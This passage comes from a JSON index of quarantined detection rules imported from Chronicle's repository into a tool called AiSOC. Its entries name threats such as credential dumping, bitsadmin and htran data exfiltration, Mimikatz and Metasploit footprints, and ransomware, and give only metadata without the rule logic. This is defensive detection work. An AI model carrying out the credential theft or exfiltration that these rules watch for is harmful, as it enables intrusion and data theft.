"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/covid_19_phishing_campaign__fake_world_health_organization.yaral" } }, { "id": "chronicle-detection-rules-covid19-ransomware-detection", "type": "detection", "name": "covid19_ransomware_detection", "description": "covid19_ransomware_detection", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/covid19-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "covid19_ransomware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/covid19_ransomware_detection.yaral" } }, { "id": "chronicle-detection-rules-covid19-themed-malware-via-chm-file", "type": "detection", "name": "covid19_themed_malware_via_chm_file", "description": "covid19_themed_malware_via_chm_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/covid19-themed-malware-via-chm-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "covid19_themed_malware_via_chm_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/covid_19_themed_malware_via_chm_file.yaral" } }, { "id": "chronicle-detection-rules-create-dump-process-dump", "type": "detection", "name": 
"create_dump_process_dump", "description": "create_dump_process_dump", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/create-dump-process-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "create_dump_process_dump", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/create_dump_process_dump.yaral" } }, { "id": "chronicle-detection-rules-cred-dump-tools-dropped-files", "type": "detection", "name": "cred_dump_tools_dropped_files", "description": "cred_dump_tools_dropped_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cred-dump-tools-dropped-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cred_dump_tools_dropped_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/cred_dump_tools_dropped_files.yaral" } }, { "id": "chronicle-detection-rules-credential-dumping-attempt-via-werfault", "type": 
"detection", "name": "credential_dumping_attempt_via_werfault", "description": "credential_dumping_attempt_via_werfault", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/credential-dumping-attempt-via-werfault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "credential_dumping_attempt_via_werfault", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/credential_dumping_attempt_via_werfault.yaral" } }, { "id": "chronicle-detection-rules-crypt32dll-nsa-vulnerability-cve20200601", "type": "detection", "name": "crypt32dll_nsa_vulnerability_cve20200601", "description": "crypt32dll_nsa_vulnerability_cve20200601", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/crypt32dll-nsa-vulnerability-cve20200601.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "crypt32dll_nsa_vulnerability_cve20200601", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/proactive_exploit_detection/windows/crypt32_dll_nsa_vulnerability__cve_2020_0601.yaral" } }, { "id": "chronicle-detection-rules-crypto-miner-user-agent", "type": "detection", "name": "crypto_miner_user_agent", "description": "crypto_miner_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/crypto-miner-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "crypto_miner_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/crypto_miner_user_agent.yaral" } }, { "id": "chronicle-detection-rules-currentcontrolset-autorun-keys-modification", "type": "detection", "name": "currentcontrolset_autorun_keys_modification", "description": "currentcontrolset_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/currentcontrolset-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "currentcontrolset_autorun_keys_modification", "source_commit": "74dd490", "license": 
"Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/currentcontrolset_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-currentversion-autorun-keys-modification", "type": "detection", "name": "currentversion_autorun_keys_modification", "description": "currentversion_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "currentversion_autorun_keys_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/currentversion_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-cve201813379-fortigate-ssl-vpn-arbitrary-file-reading", "type": "detection", "name": "cve201813379_fortigate_ssl_vpn_arbitrary_file_reading", "description": "cve201813379_fortigate_ssl_vpn_arbitrary_file_reading", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve201813379-fortigate-ssl-vpn-arbitrary-file-reading.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve201813379_fortigate_ssl_vpn_arbitrary_file_reading", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/cve_2018_13379_fortigate_ssl_vpn_arbitrary_file_reading.yaral" } }, { "id": "chronicle-detection-rules-cve20200688-exchange-exploitation-via-web-log", "type": "detection", "name": "cve20200688_exchange_exploitation_via_web_log", "description": "cve20200688_exchange_exploitation_via_web_log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve20200688-exchange-exploitation-via-web-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve20200688_exchange_exploitation_via_web_log", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/webserver/cve_2020_0688_exchange_exploitation_via_web_log.yaral" } }, { "id": "chronicle-detection-rules-cve20201350-dns-remote-code-exploit-sigred-via-cmdline", "type": "detection", "name": "cve20201350_dns_remote_code_exploit_sigred_via_cmdline", "description": "cve20201350_dns_remote_code_exploit_sigred_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve20201350-dns-remote-code-exploit-sigred-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve20201350_dns_remote_code_exploit_sigred_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/process_creation/cve_2020_1350_dns_remote_code_exploit__sigred___via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-cve20201350-sigred-windows-dns-dos-exploit-nslookup-cli", "type": "detection", "name": "cve20201350_sigred__windows_dns_dos_exploit_nslookup_cli", "description": "cve20201350_sigred__windows_dns_dos_exploit_nslookup_cli", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve20201350-sigred-windows-dns-dos-exploit-nslookup-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve20201350_sigred__windows_dns_dos_exploit_nslookup_cli", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cve_2020_1350__sigred____windows_dns_dos_exploit__nslookup_cli.yaral" } }, { "id": "chronicle-detection-rules-danabot-trojan-sysmon", "type": "detection", "name": "danabot_trojan_sysmon", "description": "danabot_trojan_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/danabot-trojan-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "danabot_trojan_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/danabot_trojan__sysmon.yaral" } }, { "id": "chronicle-detection-rules-darkgate-cryptocurrency-mining-and-ransomware-campaign-sysmon", "type": "detection", "name": "darkgate_cryptocurrency_mining_and_ransomware_campaign_sysmon", "description": "darkgate_cryptocurrency_mining_and_ransomware_campaign_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/darkgate-cryptocurrency-mining-and-ransomware-campaign-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"darkgate_cryptocurrency_mining_and_ransomware_campaign_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/darkgate_cryptocurrency_mining_and_ransomware_campaign__sysmon.yaral" } }, { "id": "chronicle-detection-rules-data-compression-detector-sysmon-behavior", "type": "detection", "name": "data_compression_detector_sysmon_behavior", "description": "data_compression_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/data-compression-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_compression_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/data_compression_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-data-exfiltration-attempt-via-bitsadmin", "type": "detection", "name": "data_exfiltration_attempt_via_bitsadmin", "description": "data_exfiltration_attempt_via_bitsadmin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/data-exfiltration-attempt-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_exfiltration_attempt_via_bitsadmin", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/data_exfiltration_attempt_via_bitsadmin.yaral" } }, { "id": "chronicle-detection-rules-data-exfiltration-detection-with-htran", "type": "detection", "name": "data_exfiltration_detection_with_htran", "description": "data_exfiltration_detection_with_htran", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/data-exfiltration-detection-with-htran.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_exfiltration_detection_with_htran", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/data_exfiltration_detection_with_htran.yaral" } }, { "id": "chronicle-detection-rules-data-seondbin-ransomware-detector-sysmon-behavior", "type": "detection", "name": "data_seondbin_ransomware_detector_sysmon_behavior", "description": "data_seondbin_ransomware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/data-seondbin-ransomware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_seondbin_ransomware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/1data_seond_bin_ransomware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-default-powersploit-and-empire-schtasks-persistence", "type": "detection", "name": "default_powersploit_and_empire_schtasks_persistence", "description": "default_powersploit_and_empire_schtasks_persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/default-powersploit-and-empire-schtasks-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "default_powersploit_and_empire_schtasks_persistence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/default_powersploit_and_empire_schtasks_persistence.yaral" } }, { "id": "chronicle-detection-rules-default-powersploit-schtasks-persistence", "type": "detection", "name": "default_powersploit_schtasks_persistence", "description": "default_powersploit_schtasks_persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/default-powersploit-schtasks-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "default_powersploit_schtasks_persistence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/default_powersploit_schtasks_persistence.yaral" } }, { "id": "chronicle-detection-rules-default-rdp-port-changed-to-non-standard-port", "type": "detection", "name": "default_rdp_port_changed_to_non_standard_port", "description": "default_rdp_port_changed_to_non_standard_port", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/default-rdp-port-changed-to-non-standard-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "default_rdp_port_changed_to_non_standard_port", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/default_rdp_port_changed_to_non_standard_port.yaral" } }, { "id": "chronicle-detection-rules-detect-cmdexe-obfuscation", "type": "detection", "name": "detect_cmdexe_obfuscation", "description": "detect_cmdexe_obfuscation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-cmdexe-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_cmdexe_obfuscation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_cmd_exe_obfuscation.yaral" } }, { "id": "chronicle-detection-rules-detect-crackmapexec-mimikatz-module-footprint-on-a-victim-machine", "type": "detection", "name": "detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine", "description": "detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/detect-crackmapexec-mimikatz-module-footprint-on-a-victim-machine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine.yaral" } }, { "id": "chronicle-detection-rules-detect-enumeration-via-wmi", "type": "detection", "name": "detect_enumeration_via_wmi", "description": "detect_enumeration_via_wmi", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-enumeration-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_enumeration_via_wmi", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_enumeration_via_wmi.yaral" } }, { "id": "chronicle-detection-rules-detect-hawkeye-keylogger-on-your-windows-endpoints", "type": "detection", "name": "detect_hawkeye_keylogger_on_your_windows_endpoints", "description": "detect_hawkeye_keylogger_on_your_windows_endpoints", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-hawkeye-keylogger-on-your-windows-endpoints.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_hawkeye_keylogger_on_your_windows_endpoints", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_hawkeye_keylogger_on_your_windows_endpoints.yaral" } }, { "id": "chronicle-detection-rules-detect-possible-discovery-and-collection-of-files", "type": "detection", "name": "detect_possible_discovery_and_collection_of_files", "description": "detect_possible_discovery_and_collection_of_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-possible-discovery-and-collection-of-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_possible_discovery_and_collection_of_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_possible_discovery_and_collection_of_files.yaral" } }, { "id": "chronicle-detection-rules-detect-possible-execution-of-phishing-attachment", "type": "detection", "name": "detect_possible_execution_of_phishing_attachment", "description": "detect_possible_execution_of_phishing_attachment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-possible-execution-of-phishing-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_possible_execution_of_phishing_attachment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_possible_execution_of_phishing_attachment.yaral" } }, { "id": "chronicle-detection-rules-detect-possible-pony-malware", "type": "detection", "name": "detect_possible_pony_malware", "description": "detect_possible_pony_malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-possible-pony-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "detect_possible_pony_malware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/detect_possible_pony_malware.yaral" } }, { "id": "chronicle-detection-rules-detect-rogue-servicesexe-process", "type": "detection", "name": "detect_rogue_servicesexe_process", "description": "detect_rogue_servicesexe_process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-rogue-servicesexe-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_rogue_servicesexe_process", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_rogue_services_exe_process.yaral" } }, { "id": "chronicle-detection-rules-detect-search-for-credentials-on-windows-operating-system", "type": "detection", "name": "detect_search_for_credentials_on_windows_operating_system", "description": "detect_search_for_credentials_on_windows_operating_system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/detect-search-for-credentials-on-windows-operating-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_search_for_credentials_on_windows_operating_system", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_search_for_credentials_on_windows_operating_system.yaral" } }, { "id": "chronicle-detection-rules-detect-service-creation-by-metasploit-on-victim-machine", "type": "detection", "name": "detect_service_creation_by_metasploit_on_victim_machine", "description": "detect_service_creation_by_metasploit_on_victim_machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-service-creation-by-metasploit-on-victim-machine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_service_creation_by_metasploit_on_victim_machine", "source_commit": "74dd490", "license": "Apache-2.0", 